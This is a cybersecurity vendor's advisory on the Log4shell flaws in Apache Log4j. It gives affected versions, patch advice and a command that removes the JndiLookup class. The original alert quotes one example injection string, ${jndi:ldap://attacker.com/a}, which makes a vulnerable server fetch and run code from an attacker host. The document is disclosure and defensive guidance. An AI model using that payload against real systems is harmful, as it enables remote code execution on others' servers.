THREAT FLASH ALERT: Updated Patch Vulnerability Info for Log4shell Remote Code Execution Vulnerability | SEE ALERT →

UPDATED FLASH ALERT: Apache Log4shell Remote Code Execution Vulnerability

Updated Information to Apache Log4shell Remote Code Execution Vulnerability

Event Summary

Security On-Demand’s Threat Recon Unit continues to track the development of the log4shell vulnerability present in log4j, a nearly ubiquitous Java logging utility present in Linux/Unix distributions and more. As the community predicted, the vulnerability has been rapidly weaponized. Initial attacks mainly comprised of dropping XMRig cryptocurrency miners, but now APT’s, access brokers, and at least one ransomware group have been observed exploiting log4shell to harm organizations. Furthermore, some initial mitigations and patch 2.15 can be defeated to execute remote code or create a Denial of Service (DoS) condition.

Details

CVE-2021-45046   – MITRE CVE Listing

Previously issued patch 2.15.0 was found inadequate and allows an attacker to create a DoS condition in non-standard environments. Logging that uses a non-default pattern layout via context lookup or a thread context map pattern can allow an attacker to craft a malicious request, resulting in a DoS condition.

Additionally, the previously recommended mitigation of configuring log4j2.formatMsgNoLookups to “true” does not protect against remote code execution or DoS conditions.

Affected Versions:

CVE-2021-45046 – Denial of Service (DoS) Vulnerability – All versions from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0

CVE-2021-44228 – Remote Code Execution – All versions of Log4j from 2.0-beta9 to 2.14.1.

Recommendations and Mitigations for Log4shell Remote Code Execution Vulnerability

CVE-2021-45046 – Denial of Service (DoS) Vulnerability

  • Update to version 2.16.0
  • Remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

CVE-2021-44228 – Remote Code Execution Vulnerability

  • Update to at least version 2.15.0
  • Remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
  • Java 7 users should upgrade to version 2.12.0 immediately upon release.

SOD Actions

The Security On-Demand Threat Recon Unit will continue to monitor these events and provide relevant updates. At this time SOD recommends applying vendor patches immediately.

If you have any questions about this alert, please contact your Security On-Demand Customer Success Manager.

Resources

Log4j Security Vulnerabilities – Apache Security Advisory

2.16.0 Released – Vendor Patches

CISA Log4j Vulnerability Guidance – CISA information

 

Original Flash Alert from Friday, December 12, 2021

Event Summary

A critical-rated (CVSS 10) vulnerability has been discovered in Apache Log4j, a popular Java logging library. Initially reported by Alibaba Cloud Security Team, CVE-2021-44228 can allow an unauthenticated attacker to inject malicious strings into a logging server, resulting in remote code execution. Open source intelligence (OSINT) sources report mass internet scanning for vulnerable devices, likely indicating a campaign startup. Immediate patching is advised.

Details

CVE-2021-44228 – MITRE CVE Listing

Apache Log4j versions 2.14.1 and earlier do not protect from an attacker or external LDAP and Java Naming and Directory Interface (JNDI) input. To attack, threat actors can manipulate user-agent headers destined to vulnerable device to log the malicious payload:

${jndi:ldap://attacker.com/a}

Then, a remote code execution (RCE) is triggered and the vulnerable device makes a request to attacker.com. using JDNI and executes any code an attacker has staged in the response.

Affected Versions:

All versions of Log4j from 2.0-beta9 to 2.14.1.

Recommendations and Mitigations

Apache has issued a security advisory and released patch version 2.15.

Log4shell can be also mitigated in versions 2.10 and older by configuring log4j2.formatMsgNoLookups to “true” or by removing the JndiLookup class from the classpath.

SOD Actions

The Security On-Demand Threat Recon Unit will continue to monitor these events and provide relevant updates. At this time, SOD recommends applying vendor patches immediately.

If you have any questions about this alert, please contact your Security On-Demand Customer Success Manager.

Resources

Log4j Security Vulnerabilities – Apache Security Advisory

2.15.0 Released – Vendor Patches

Log4Shell: RCE 0-day explo… – OSINT Analysis

RECOMMENDED POST